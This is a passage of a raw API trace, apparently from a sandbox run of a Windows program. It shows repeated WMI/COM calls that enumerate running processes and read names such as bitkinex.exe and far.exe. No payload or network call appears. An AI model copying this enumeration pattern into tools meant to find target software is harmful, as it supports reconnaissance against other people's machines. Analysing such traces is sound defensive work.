varVal1="\\\\Q9IATRKPRH\\root\\cimv2:Win32_Process.Handle=\"2952\"", varVal2=0x0), pType=0x43eacc*=8, plFlavor=0x43eac8*=64) returned 0x0 [0279.423] SysStringByteLen (bstr="\\\\Q9IATRKPRH\\root\\cimv2:Win32_Process.Handle=\"2952\"") returned 0x66 [0279.423] SysStringByteLen (bstr="\\\\Q9IATRKPRH\\root\\cimv2:Win32_Process.Handle=\"2952\"") returned 0x66 [0279.423] IComThreadingInfo:GetCurrentApartmentType (in: This=0x500344, pAptType=0x43ea6c | out: pAptType=0x43ea6c*=1) returned 0x0 [0279.423] IUnknown:QueryInterface (in: This=0x500344, riid=0x277dfcc*(Data1=0x51372ae0, Data2=0xcae7, Data3=0x11cf, Data4=([0]=0xbe, [1]=0x81, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0xa2, [6]=0xfa, [7]=0x25)), ppvObject=0x43ea70 | out: ppvObject=0x43ea70*=0x0) returned 0x80004002 [0279.423] IUnknown:Release (This=0x500344) returned 0x1 [0279.424] CoGetClassObject (in: rclsid=0x5aa304*(Data1=0xcf4cc405, Data2=0xe2c5, Data3=0x4ddd, Data4=([0]=0xb3, [1]=0xce, [2]=0x5e, [3]=0x75, [4]=0x82, [5]=0xd8, [6]=0xc9, [7]=0xfa)), dwClsContext=0x15, pvReserved=0x0, riid=0x71ea6bd4*(Data1=0x1, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppv=0x43e3e0 | out: ppv=0x43e3e0*=0x570b078) returned 0x0 [0279.424] WbemDefPath:IUnknown:QueryInterface (in: This=0x570b078, riid=0x71e6dd3c*(Data1=0xb196b28f, Data2=0xbab4, Data3=0x101a, Data4=([0]=0xb6, [1]=0x9c, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0x34, [6]=0x1d, [7]=0x7)), ppvObject=0x43e5f8 | out: ppvObject=0x43e5f8*=0x0) returned 0x80004002 [0279.424] WbemDefPath:IClassFactory:CreateInstance (in: This=0x570b078, pUnkOuter=0x0, riid=0x71d52a54*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x43e604 | out: ppvObject=0x43e604*=0x5702dd0) returned 0x0 [0279.424] WbemDefPath:IUnknown:Release (This=0x570b078) returned 0x0 [0279.424] WbemDefPath:IUnknown:QueryInterface (in: This=0x5702dd0, riid=0x71d52a54*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x43e224 | out: ppvObject=0x43e224*=0x5702dd0) returned 0x0 [0279.425] WbemDefPath:IUnknown:QueryInterface (in: This=0x5702dd0, riid=0x71e41b6c*(Data1=0xc3fcc19e, Data2=0xa970, Data3=0x11d2, Data4=([0]=0x8b, [1]=0x5a, [2]=0x0, [3]=0xa0, [4]=0xc9, [5]=0xb7, [6]=0xc9, [7]=0xc4)), ppvObject=0x43e1d8 | out: ppvObject=0x43e1d8*=0x0) returned 0x80004002 [0279.425] WbemDefPath:IUnknown:AddRef (This=0x5702dd0) returned 0x3 [0279.425] WbemDefPath:IUnknown:QueryInterface (in: This=0x5702dd0, riid=0x71e4182c*(Data1=0xecc8691b, Data2=0xc1db, Data3=0x4dc0, Data4=([0]=0x85, [1]=0x5e, [2]=0x65, [3]=0xf6, [4]=0xc5, [5]=0x51, [6]=0xaf, [7]=0x49)), ppvObject=0x43db34 | out: ppvObject=0x43db34*=0x0) returned 0x80004002 [0279.425] WbemDefPath:IUnknown:QueryInterface (in: This=0x5702dd0, riid=0x71e41764*(Data1=0x94ea2b94, Data2=0xe9cc, Data3=0x49e0, Data4=([0]=0xc0, [1]=0xff, [2]=0xee, [3]=0x64, [4]=0xca, [5]=0x8f, [6]=0x5b, [7]=0x90)), ppvObject=0x43dae4 | out: ppvObject=0x43dae4*=0x0) returned 0x80004002 [0279.425] WbemDefPath:IUnknown:QueryInterface (in: This=0x5702dd0, riid=0x71d71388*(Data1=0x3, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x43daf0 | out: ppvObject=0x43daf0*=0x570b088) returned 0x0 [0279.425] WbemDefPath:IMarshal:GetUnmarshalClass (in: This=0x570b088, riid=0x71d52a54*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), pv=0x0, dwDestContext=0x3, pvDestContext=0x0, mshlflags=0x0, pCid=0x43daf8 | out: pCid=0x43daf8*(Data1=0x33a, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46))) returned 0x0 [0279.425] WbemDefPath:IUnknown:Release (This=0x570b088) returned 0x3 [0279.426] WbemDefPath:IUnknown:QueryInterface (in: This=0x5702dd0, riid=0x71e41aa8*(Data1=0x144, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x43dfe4 | out: ppvObject=0x43dfe4*=0x0) returned 0x80004002 [0279.426] WbemDefPath:IUnknown:Release (This=0x5702dd0) returned 0x2 [0279.426] WbemDefPath:IUnknown:Release (This=0x5702dd0) returned 0x1 [0279.426] WbemDefPath:IUnknown:QueryInterface (in: This=0x5702dd0, riid=0x43e924*(Data1=0x3bc15af2, Data2=0x736c, Data3=0x477e, Data4=([0]=0x9e, [1]=0x51, [2]=0x23, [3]=0x8a, [4]=0xf8, [5]=0x66, [6]=0x7d, [7]=0xcc)), ppvObject=0x43e920 | out: ppvObject=0x43e920*=0x5702dd0) returned 0x0 [0279.426] WbemDefPath:IUnknown:AddRef (This=0x5702dd0) returned 0x3 [0279.426] WbemDefPath:IUnknown:Release (This=0x5702dd0) returned 0x2 [0279.426] WbemDefPath:IWbemPath:SetText (This=0x5702dd0, uMode=0x4, pszPath="\\\\Q9IATRKPRH\\root\\cimv2:Win32_Process.Handle=\"2952\"") returned 0x0 [0279.426] WbemDefPath:IWbemPath:GetNamespaceCount (in: This=0x5a8ed8, puCount=0x43eaa0 | out: puCount=0x43eaa0*=0x2) returned 0x0 [0279.426] WbemDefPath:IWbemPath:GetText (in: This=0x5a8ed8, lFlags=4, puBuffLength=0x43ea9c*=0x0, pszText=0x0 | out: puBuffLength=0x43ea9c*=0xf, pszText=0x0) returned 0x0 [0279.427] WbemDefPath:IWbemPath:GetText (in: This=0x5a8ed8, lFlags=4, puBuffLength=0x43ea9c*=0xf, pszText="00000000000000" | out: puBuffLength=0x43ea9c*=0xf, pszText="\\\\.\\root\\cimv2") returned 0x0 [0279.427] WbemDefPath:IWbemPath:GetNamespaceCount (in: This=0x5a8ed8, puCount=0x43ea6c | out: puCount=0x43ea6c*=0x2) returned 0x0 [0279.427] WbemDefPath:IWbemPath:GetText (in: This=0x5a8ed8, lFlags=4, puBuffLength=0x43ea68*=0x0, pszText=0x0 | out: puBuffLength=0x43ea68*=0xf, pszText=0x0) returned 0x0 [0279.427] WbemDefPath:IWbemPath:GetText (in: This=0x5a8ed8, lFlags=4, puBuffLength=0x43ea68*=0xf, pszText="00000000000000" | out: puBuffLength=0x43ea68*=0xf, pszText="\\\\.\\root\\cimv2") returned 0x0 [0279.427] IWbemClassObject:Get (in: This=0x5704e68, wszName="Name", lFlags=0, pVal=0x43ea68*(varType=0x0, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x0, varVal2=0x0), pType=0x27ccad8*=0, plFlavor=0x27ccadc*=0 | out: pVal=0x43ea68*(varType=0x8, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1="bitkinex.exe", varVal2=0x0), pType=0x27ccad8*=8, plFlavor=0x27ccadc*=0) returned 0x0 [0279.427] SysStringByteLen (bstr="bitkinex.exe") returned 0x18 [0279.427] SysStringByteLen (bstr="bitkinex.exe") returned 0x18 [0279.427] IWbemClassObject:Get (in: This=0x5704e68, wszName="Name", lFlags=0, pVal=0x43ea70*(varType=0x0, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x0, varVal2=0x0), pType=0x27ccad8*=8, plFlavor=0x27ccadc*=0 | out: pVal=0x43ea70*(varType=0x8, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1="bitkinex.exe", varVal2=0x0), pType=0x27ccad8*=8, plFlavor=0x27ccadc*=0) returned 0x0 [0279.427] SysStringByteLen (bstr="bitkinex.exe") returned 0x18 [0279.427] SysStringByteLen (bstr="bitkinex.exe") returned 0x18 [0279.428] IEnumWbemClassObject:Next (in: This=0x5115f8, lTimeout=-1, uCount=0x1, apObjects=0x570b0b8, puReturned=0x27bb39c | out: apObjects=0x570b0b8*=0x5705000, puReturned=0x27bb39c*=0x1) returned 0x0 [0279.429] IUnknown:QueryInterface (in: This=0x5705000, riid=0x71d52a54*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x43e0cc | out: ppvObject=0x43e0cc*=0x5705000) returned 0x0 [0279.429] IUnknown:QueryInterface (in: This=0x5705000, riid=0x71e41b6c*(Data1=0xc3fcc19e, Data2=0xa970, Data3=0x11d2, Data4=([0]=0x8b, [1]=0x5a, [2]=0x0, [3]=0xa0, [4]=0xc9, [5]=0xb7, [6]=0xc9, [7]=0xc4)), ppvObject=0x43e080 | out: ppvObject=0x43e080*=0x0) returned 0x80004002 [0279.429] IUnknown:QueryInterface (in: This=0x5705000, riid=0x71e41e84*(Data1=0xb196b283, Data2=0xbab4, Data3=0x101a, Data4=([0]=0xb6, [1]=0x9c, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0x34, [6]=0x1d, [7]=0x7)), ppvObject=0x43dea8 | out: ppvObject=0x43dea8*=0x0) returned 0x80004002 [0279.430] IUnknown:AddRef (This=0x5705000) returned 0x3 [0279.430] IUnknown:QueryInterface (in: This=0x5705000, riid=0x71e4182c*(Data1=0xecc8691b, Data2=0xc1db, Data3=0x4dc0, Data4=([0]=0x85, [1]=0x5e, [2]=0x65, [3]=0xf6, [4]=0xc5, [5]=0x51, [6]=0xaf, [7]=0x49)), ppvObject=0x43d9dc | out: ppvObject=0x43d9dc*=0x0) returned 0x80004002 [0279.430] IUnknown:QueryInterface (in: This=0x5705000, riid=0x71e41764*(Data1=0x94ea2b94, Data2=0xe9cc, Data3=0x49e0, Data4=([0]=0xc0, [1]=0xff, [2]=0xee, [3]=0x64, [4]=0xca, [5]=0x8f, [6]=0x5b, [7]=0x90)), ppvObject=0x43d98c | out: ppvObject=0x43d98c*=0x0) returned 0x80004002 [0279.430] IUnknown:QueryInterface (in: This=0x5705000, riid=0x71d71388*(Data1=0x3, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x43d998 | out: ppvObject=0x43d998*=0x5705004) returned 0x0 [0279.430] IMarshal:GetUnmarshalClass (in: This=0x5705004, riid=0x71d52a54*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), pv=0x0, dwDestContext=0x3, pvDestContext=0x0, mshlflags=0x0, pCid=0x43d9a0 | out: pCid=0x43d9a0*(Data1=0x4590f812, Data2=0x1d3a, Data3=0x11d0, Data4=([0]=0x89, [1]=0x1f, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0x4b, [6]=0x2e, [7]=0x24))) returned 0x0 [0279.430] IUnknown:Release (This=0x5705004) returned 0x3 [0279.430] IUnknown:QueryInterface (in: This=0x5705000, riid=0x71e41aa8*(Data1=0x144, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x43de8c | out: ppvObject=0x43de8c*=0x0) returned 0x80004002 [0279.430] IUnknown:Release (This=0x5705000) returned 0x2 [0279.431] IUnknown:QueryInterface (in: This=0x5705000, riid=0x43e424*(Data1=0xdc12a681, Data2=0x737f, Data3=0x11cf, Data4=([0]=0x88, [1]=0x4d, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0x4b, [6]=0x2e, [7]=0x24)), ppvObject=0x43e420 | out: ppvObject=0x43e420*=0x5705000) returned 0x0 [0279.431] IUnknown:AddRef (This=0x5705000) returned 0x4 [0279.431] IUnknown:Release (This=0x5705000) returned 0x3 [0279.431] IUnknown:Release (This=0x5705000) returned 0x2 [0279.431] CoTaskMemFree (pv=0x570b0b8) [0279.431] IUnknown:AddRef (This=0x5705000) returned 0x3 [0279.431] IWbemClassObject:Get (in: This=0x5705000, wszName="__GENUS", lFlags=0, pVal=0x43ea64*(varType=0x0, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x0, varVal2=0x0), pType=0x43eae4*=0, plFlavor=0x43eae0*=0 | out: pVal=0x43ea64*(varType=0x3, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x2, varVal2=0x0), pType=0x43eae4*=3, plFlavor=0x43eae0*=64) returned 0x0 [0279.432] IWbemClassObject:Get (in: This=0x5705000, wszName="__PATH", lFlags=0, pVal=0x43ea48*(varType=0x0, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x0, varVal2=0x0), pType=0x43eacc*=0, plFlavor=0x43eac8*=0 | out: pVal=0x43ea48*(varType=0x8, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1="\\\\Q9IATRKPRH\\root\\cimv2:Win32_Process.Handle=\"2960\"", varVal2=0x0), pType=0x43eacc*=8, plFlavor=0x43eac8*=64) returned 0x0 [0279.432] SysStringByteLen (bstr="\\\\Q9IATRKPRH\\root\\cimv2:Win32_Process.Handle=\"2960\"") returned 0x66 [0279.432] SysStringByteLen (bstr="\\\\Q9IATRKPRH\\root\\cimv2:Win32_Process.Handle=\"2960\"") returned 0x66 [0279.432] IComThreadingInfo:GetCurrentApartmentType (in: This=0x500344, pAptType=0x43ea6c | out: pAptType=0x43ea6c*=1) returned 0x0 [0279.432] IUnknown:QueryInterface (in: This=0x500344, riid=0x277dfcc*(Data1=0x51372ae0, Data2=0xcae7, Data3=0x11cf, Data4=([0]=0xbe, [1]=0x81, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0xa2, [6]=0xfa, [7]=0x25)), ppvObject=0x43ea70 | out: ppvObject=0x43ea70*=0x0) returned 0x80004002 [0279.432] IUnknown:Release (This=0x500344) returned 0x1 [0279.433] CoGetClassObject (in: rclsid=0x5aa304*(Data1=0xcf4cc405, Data2=0xe2c5, Data3=0x4ddd, Data4=([0]=0xb3, [1]=0xce, [2]=0x5e, [3]=0x75, [4]=0x82, [5]=0xd8, [6]=0xc9, [7]=0xfa)), dwClsContext=0x15, pvReserved=0x0, riid=0x71ea6bd4*(Data1=0x1, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppv=0x43e3e0 | out: ppv=0x43e3e0*=0x570b0b8) returned 0x0 [0279.433] WbemDefPath:IUnknown:QueryInterface (in: This=0x570b0b8, riid=0x71e6dd3c*(Data1=0xb196b28f, Data2=0xbab4, Data3=0x101a, Data4=([0]=0xb6, [1]=0x9c, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0x34, [6]=0x1d, [7]=0x7)), ppvObject=0x43e5f8 | out: ppvObject=0x43e5f8*=0x0) returned 0x80004002 [0279.433] WbemDefPath:IClassFactory:CreateInstance (in: This=0x570b0b8, pUnkOuter=0x0, riid=0x71d52a54*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x43e604 | out: ppvObject=0x43e604*=0x570dc88) returned 0x0 [0279.433] WbemDefPath:IUnknown:Release (This=0x570b0b8) returned 0x0 [0279.433] WbemDefPath:IUnknown:QueryInterface (in: This=0x570dc88, riid=0x71d52a54*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x43e224 | out: ppvObject=0x43e224*=0x570dc88) returned 0x0 [0279.433] WbemDefPath:IUnknown:QueryInterface (in: This=0x570dc88, riid=0x71e41b6c*(Data1=0xc3fcc19e, Data2=0xa970, Data3=0x11d2, Data4=([0]=0x8b, [1]=0x5a, [2]=0x0, [3]=0xa0, [4]=0xc9, [5]=0xb7, [6]=0xc9, [7]=0xc4)), ppvObject=0x43e1d8 | out: ppvObject=0x43e1d8*=0x0) returned 0x80004002 [0279.434] WbemDefPath:IUnknown:AddRef (This=0x570dc88) returned 0x3 [0279.434] WbemDefPath:IUnknown:QueryInterface (in: This=0x570dc88, riid=0x71e4182c*(Data1=0xecc8691b, Data2=0xc1db, Data3=0x4dc0, Data4=([0]=0x85, [1]=0x5e, [2]=0x65, [3]=0xf6, [4]=0xc5, [5]=0x51, [6]=0xaf, [7]=0x49)), ppvObject=0x43db34 | out: ppvObject=0x43db34*=0x0) returned 0x80004002 [0279.434] WbemDefPath:IUnknown:QueryInterface (in: This=0x570dc88, riid=0x71e41764*(Data1=0x94ea2b94, Data2=0xe9cc, Data3=0x49e0, Data4=([0]=0xc0, [1]=0xff, [2]=0xee, [3]=0x64, [4]=0xca, [5]=0x8f, [6]=0x5b, [7]=0x90)), ppvObject=0x43dae4 | out: ppvObject=0x43dae4*=0x0) returned 0x80004002 [0279.434] WbemDefPath:IUnknown:QueryInterface (in: This=0x570dc88, riid=0x71d71388*(Data1=0x3, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x43daf0 | out: ppvObject=0x43daf0*=0x570b0c8) returned 0x0 [0279.434] WbemDefPath:IMarshal:GetUnmarshalClass (in: This=0x570b0c8, riid=0x71d52a54*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), pv=0x0, dwDestContext=0x3, pvDestContext=0x0, mshlflags=0x0, pCid=0x43daf8 | out: pCid=0x43daf8*(Data1=0x33a, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46))) returned 0x0 [0279.434] WbemDefPath:IUnknown:Release (This=0x570b0c8) returned 0x3 [0279.434] WbemDefPath:IUnknown:QueryInterface (in: This=0x570dc88, riid=0x71e41aa8*(Data1=0x144, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x43dfe4 | out: ppvObject=0x43dfe4*=0x0) returned 0x80004002 [0279.435] WbemDefPath:IUnknown:Release (This=0x570dc88) returned 0x2 [0279.435] WbemDefPath:IUnknown:Release (This=0x570dc88) returned 0x1 [0279.435] WbemDefPath:IUnknown:QueryInterface (in: This=0x570dc88, riid=0x43e924*(Data1=0x3bc15af2, Data2=0x736c, Data3=0x477e, Data4=([0]=0x9e, [1]=0x51, [2]=0x23, [3]=0x8a, [4]=0xf8, [5]=0x66, [6]=0x7d, [7]=0xcc)), ppvObject=0x43e920 | out: ppvObject=0x43e920*=0x570dc88) returned 0x0 [0279.435] WbemDefPath:IUnknown:AddRef (This=0x570dc88) returned 0x3 [0279.435] WbemDefPath:IUnknown:Release (This=0x570dc88) returned 0x2 [0279.435] WbemDefPath:IWbemPath:SetText (This=0x570dc88, uMode=0x4, pszPath="\\\\Q9IATRKPRH\\root\\cimv2:Win32_Process.Handle=\"2960\"") returned 0x0 [0279.435] WbemDefPath:IWbemPath:GetNamespaceCount (in: This=0x5a8ed8, puCount=0x43eaa0 | out: puCount=0x43eaa0*=0x2) returned 0x0 [0279.435] WbemDefPath:IWbemPath:GetText (in: This=0x5a8ed8, lFlags=4, puBuffLength=0x43ea9c*=0x0, pszText=0x0 | out: puBuffLength=0x43ea9c*=0xf, pszText=0x0) returned 0x0 [0279.435] WbemDefPath:IWbemPath:GetText (in: This=0x5a8ed8, lFlags=4, puBuffLength=0x43ea9c*=0xf, pszText="00000000000000" | out: puBuffLength=0x43ea9c*=0xf, pszText="\\\\.\\root\\cimv2") returned 0x0 [0279.435] WbemDefPath:IWbemPath:GetNamespaceCount (in: This=0x5a8ed8, puCount=0x43ea6c | out: puCount=0x43ea6c*=0x2) returned 0x0 [0279.435] WbemDefPath:IWbemPath:GetText (in: This=0x5a8ed8, lFlags=4, puBuffLength=0x43ea68*=0x0, pszText=0x0 | out: puBuffLength=0x43ea68*=0xf, pszText=0x0) returned 0x0 [0279.435] WbemDefPath:IWbemPath:GetText (in: This=0x5a8ed8, lFlags=4, puBuffLength=0x43ea68*=0xf, pszText="00000000000000" | out: puBuffLength=0x43ea68*=0xf, pszText="\\\\.\\root\\cimv2") returned 0x0 [0279.435] IWbemClassObject:Get (in: This=0x5705000, wszName="Name", lFlags=0, pVal=0x43ea68*(varType=0x0, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x0, varVal2=0x0), pType=0x27cd34c*=0, plFlavor=0x27cd350*=0 | out: pVal=0x43ea68*(varType=0x8, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1="far.exe", varVal2=0x0), pType=0x27cd34c*=8, plFlavor=0x27cd350*=0) returned 0x0 [0279.436] SysStringByteLen (bstr="far.exe") returned 0xe [0279.436] SysStringByteLen (bstr="far.exe") returned 0xe [0279.436] IWbemClassObject:Get (in: This=0x5705000, wszName="Name", lFlags=0, pVal=0x43ea70*(varType=0x0, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x0, varVal2=0x0), pType=0x27cd34c*=8, plFlavor=0x27cd350*=0 | out: pVal=0x43ea70*(varType=0x8, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1="far.exe", varVal2=0x0), pType=0x27cd34c*=8, plFlavor=0x27cd350*=0) returned 0x0 [0279.436] SysStringByteLen (bstr="far.exe") returned 0xe [0279.436] SysStringByteLen (bstr="far.exe") returned 0xe [0279.436] IEnumWbemClassObject:Next (in: This=0x5115f8, lTimeout=-1, uCount=0x1, apObjects=0x570b0f8, puReturned=0x27bb39c | out: apObjects=0x570b0f8*=0x5705198, puReturned=0x27bb39c*=0x1) returned 0x0 [0279.470] IUnknown:QueryInterface (in: This=0x5705198, riid=0x71d52a54*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x43e0cc | out: ppvObject=0x43e0cc*=0x5705198) returned 0x0 [0279.470] IUnknown:QueryInterface (in: This=0x5705198, riid=0x71e41b6c*(Data1=0xc3fcc19e, Data2=0xa970, Data3=0x11d2, Data4=([0]=0x8b, [1]=0x5a, [2]=0x0, [3]=0xa0, [4]=0xc9, [5]=0xb7, [6]=0xc9, [7]=0xc4)), ppvObject=0x43e080 | out: ppvObject=0x43e080*=0x0) returned 0x80004002 [0279.470] IUnknown:QueryInterface (in: This=0x5705198, riid=0x71e41e84*(Data1=0xb196b283, Data2=0xbab4, Data3=0x101a, Data4=([0]=0xb6, [1]=0x9c, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0x34, [6]=0x1d, [7]=0x7)), ppvObject=0x43dea8 | out: ppvObject=0x43dea8*=0x0) returned 0x80004002 [0279.471] IUnknown:AddRef (This=0x5705198) returned 0x3 [0279.471] IUnknown:QueryInterface (in: This=0x5705198, riid=0x71e4182c*(Data1=0xecc8691b, Data2=0xc1db, Data3=0x4dc0, Data4=([0]=0x85, [1]=0x5e, [2]=0x65, [3]=0xf6, [4]=0xc5, [5]=0x51, [6]=0xaf, [7]=0x49)), ppvObject=0x43d9dc | out: ppvObject=0x43d9dc*=0x0) returned 0x80004002 [0279.471] IUnknown:QueryInterface (in: This=0x5705198, riid=0x71e41764*(Data1=0x94ea2b94, Data2=0xe9cc, Data3=0x49e0, Data4=([0]=0xc0, [1]=0xff, [2]=0xee, [3]=0x64, [4]=0xca, [5]=0x8f, [6]=0x5b, [7]=0x90)), ppvObject=0x43d98c | out: ppvObject=0x43d98c*=0x0) returned 0x80004002 [0279.471] IUnknown:QueryInterface (in: This=0x5705198, riid=0x71d71388*(Data1=0x3, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x43d998 | out: ppvObject=0x43d998*=0x570519c) returned 0x0 [0279.472] IMarshal:GetUnmarshalClass (in: This=0x570519c, riid=0x71d52a54*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), pv=0x0, dwDestContext=0x3, pvDestContext=0x0, mshlflags=0x0, pCid=0x43d9a0 | out: pCid=0x43d9a0*(Data1=0x4590f812, Data2=0x1d3a, Data3=0x11d0, Data4=([0]=0x89, [1]=0x1f, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0x4b, [6]=0x2e, [7]=0x24))) returned 0x0 [0279.472] IUnknown:Release (This=0x570519c) returned 0x3 [0279.472] IUnknown:QueryInterface (in: This=0x5705198, riid=0x71e41aa8*(Data1=0x144, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x43de8c | out: ppvObject=0x43de8c*=0x0) returned 0x80004002 [0279.472] IUnknown:Release (This=0x5705198) returned 0x2 [0279.472] IUnknown:QueryInterface (in: This=0x5705198, riid=0x43e424*(Data1=0xdc12a681, Data2=0x737f, Data3=0x11cf, Data4=([0]=0x88, [1]=0x4d, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0x4b, [6]=0x2e, [7]=0x24)), ppvObject=0x43e420 | out: ppvObject=0x43e420*=0x5705198) returned 0x0 [0279.472] IUnknown:AddRef (This=0x5705198) returned 0x4 [0279.472] IUnknown:Release (This=0x5705198) returned 0x3 [0279.473] IUnknown:Release (This=0x5705198) returned 0x2 [0279.473] CoTaskMemFree (pv=0x570b0f8) [0279.473] IUnknown:AddRef (This=0x5705198) returned 0x3 [0279.473] IWbemClassObject:Get (in: This=0x5705198, wszName="__GENUS", lFlags=0, pVal=0x43ea64*(varType=0x0, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x0, varVal2=0x0), pType=0x43eae4*=0, plFlavor=0x43eae0*=0 | out: pVal=0x43ea64*(varType=0x3, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x2, varVal2=0x0), pType=0x43eae4*=3, plFlavor=0x43eae0*=64) returned 0x0 [0279.474] IWbemClassObject:Get (in: This=0x5705198, wszName="__PATH", lFlags=0, pVal=0x43ea48*(varType=0x0, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x0, varVal2=0x0), pType=0x43eacc*=0, plFlavor=0x43eac8*=0 | out: pVal=0x43ea48*(varType=0x8, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1="\\\\Q9IATRKPRH\\root\\cimv2:Win32_Process.Handle=\"2968\"", varVal2=0x0), pType=0x43eacc*=8, plFlavor=0x43eac8*=64) returned 0x0 [0279.474] SysStringByteLen (bstr="\\\\Q9IATRKPRH\\root\\cimv2:Win32_Process.Handle=\"2968\"") returned 0x66 [0279.474] SysStringByteLen (bstr="\\\\Q9IATRKPRH\\root\\cimv2:Win32_Process.Handle=\"2968\"") returned 0x66 [0279.474] IComThreadingInfo:GetCurrentApartmentType (in: This=0x500344, pAptType=0x43ea6c | out: pAptType=0x43ea6c*=1) returned 0x0 [0279.474] IUnknown:QueryInterface (in: This=0x500344, riid=0x277dfcc*(Data1=0x51372ae0, Data2=0xcae7, Data3=0x11cf, Data4=([0]=0xbe, [1]=0x81, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0xa2, [6]=0xfa, [7]=0x25)), ppvObject=0x43ea70 | out: ppvObject=0x43ea70*=0x0) returned 0x80004002 [0279.474] IUnknown:Release (This=0x500344) returned 0x1 [0279.475] CoGetClassObject (in: rclsid=0x5aa304*(Data1=0xcf4cc405, Data2=0xe2c5, Data3=0x4ddd, Data4=([0]=0xb3, [1]=0xce, [2]=0x5e, [3]=0x75, [4]=0x82, [5]=0xd8, [6]=0xc9, [7]=0xfa)), dwClsContext=0x15, pvReserved=0x0, riid=0x71ea6bd4*(Data1=0x1, Data2=0x0, 